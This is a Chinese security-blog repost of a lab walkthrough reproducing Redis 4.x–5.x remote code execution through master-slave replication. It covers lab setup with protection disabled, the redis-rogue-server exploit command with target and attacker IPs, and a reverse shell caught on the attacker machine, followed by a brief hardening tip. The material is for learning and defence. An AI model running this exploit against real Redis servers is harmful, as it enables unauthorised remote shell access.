Sec Hotspot 首页  收藏本站  技术博客  RSS
统计信息
已收录文章数量:8263 篇
已收录公众号数量:89 个
本站文章为爬虫采集,如有侵权请告知
本周热门文章
每日安全动态推送(02-14)   2020.02.14 08:35:03  52
威胁情报周报(2020.2.14)   2020.02.14 17:54:01  42
WiFi6来了,一个时代开启!   2020.02.17 10:47:06  39
[代码审计] - 云购CMS代码审计   2020.02.14 16:45:54  34
等保测评2.0:Windows安全审计   2020.02.15 18:00:01  33
每日安全动态推送(02-18)   2020.02.18 08:05:14  32
已收录微信公众号
网信中国 区块链大本营 白说区块链 区块链投资家 区块链官微 区块链铅笔Blockchain HACK学习呀 二道情报贩子 合天智汇 小白帽学习之路 小米安全中心 弥天安全实验室 SAINTSEC SecPulse安全脉搏 TideSec安全团队 360安全卫士 游侠安全网 计算机与网络安全 安全祖师爷 安全学习那些事 腾讯安全联合实验室 黑客技术与网络安全 安全圈 腾讯御见威胁情报中心 Python开发者 Python之禅 编程派 Python那些事 Python程序员 安全威胁情报 吾爱破解论坛 行长叠报 安在 i春秋 嘶吼专业版 E安全 MottoIN 网信防务 网安杂谈 数说安全 互联网安全内参 漏洞战争 安全分析与研究 邑安全 ChaMd5安全团队 天融信阿尔法实验室 安全牛 SecWiki 安全学术圈 信安之路 漏洞感知 浅黑科技 Secquan圈子社区 奇安信集团 奇安信 CERT 国舜股份 雷神众测 盘古实验室 美团安全应急响应中心 瓜子安全应急响应中心 顺丰安全应急响应中心 蚂蚁金服安全响应中心 携程安全应急响应中心 滴滴安全应急响应中心 字节跳动安全中心 百度安全应急响应中心 腾讯安全应急响应中心 网易安全应急响应中心 OPPO安全应急响应中心 京东安全应急响应中心 Bypass CNNVD安全动态 安恒应急响应中心 天融信每日安全简报 奇安信威胁情报中心 看雪学院 黑白之道 水滴安全实验室 安全客 木星安全实验室 云鼎实验室 绿盟科技安全预警 白帽汇 深信服千里目安全实验室 腾讯玄武实验室 长亭安全课堂 FreeBuf 绿盟科技 nmask
漏洞复现之Redis-rce​
本文来自公众号:弥天安全实验室   2019.11.18 16:51:22

网安引领时代,弥天点亮未来




介绍

通过主从复制 GetShell


Redis主从复制

Redis是一个使用ANSIC编写的开源、支持网络、基于内存、可选持久性的键值对存储数据库。但如果当把数据存储在单个Redis的实例中,当读写体量比较大的时候,服务端就很难承受。为了应对这种情况,Redis就提供了主从模式,主从模式就是指使用一个redis实例作为主机,其他实例都作为备份机,其中主机和从机数据相同,而从机只负责读,主机只负责写,通过读写分离可以大幅度减轻流量的压力,算是一种通过牺牲空间来换取效率的缓解方式。


Redis模块

在了解了主从同步之后,我们还需要对redis的模块有所了解。在Redis 4.x之后,Redis新增了模块功能,通过外部拓展,可以实现在redis中实现一个新的Redis命令,通过写c语言并编译出.so文件。

------------------------------------------------------------------

由此可知,此方式的利用范围

  • Redis 4.x-Redis 5.x

  • 靶机:ubuntu 18.04.1   ip:192.168.112.132

  • 攻击机:kali   ip:192.168.112.133


环境搭建

wget http://download.redis.io/releases/redis-5.0.0.tar.gztar -xvzf redis-5.0.0.tar.gzcd redis-5.0.0不同机器上需更改redis.conf配置文件protected-mode yes 改为protected-mode no #关闭redis保护模式bind 127.0.0.1 改为bind 0.0.0.0 

#注意:bind的意思不是绑定外部服务器的IP,而是绑定本机可以接受连接的网卡地址,默认是只能本地访问,改动后服务器上任意网卡地址可访问。

3)靶机启动服务

cd src

./redis-server ../redis.conf

#加载指定配置


exp准备

项目地址:

https://github.com /n0b0dyCN/redis-rogue-server

用法:

python3 redis-rogue-server.py --rhost=192.168.112.132 --lhost=192.168.112.133 --exp=exp.so


exploit

弹shell至本机的时候,需输入攻击机ip,输入监听端口

监听成功


修复建议:

由于该漏洞利用前提是获取redis访问权限,也就是基于redis未授权访问。 因此可考虑把产生问题的家伙解决掉。

redis加固: https://www.cnblogs.com/iamver/p/7985556.html

参考链接:

https://www.anquanke.com/post/id/181734

https://lorexxar.cn/2019/07/10/redis-5-x-rce/



知识分享完了

喜欢别忘了关注我们哦~



学海浩茫,
予以风动,
必降弥天之润!


弥  天

安全实验室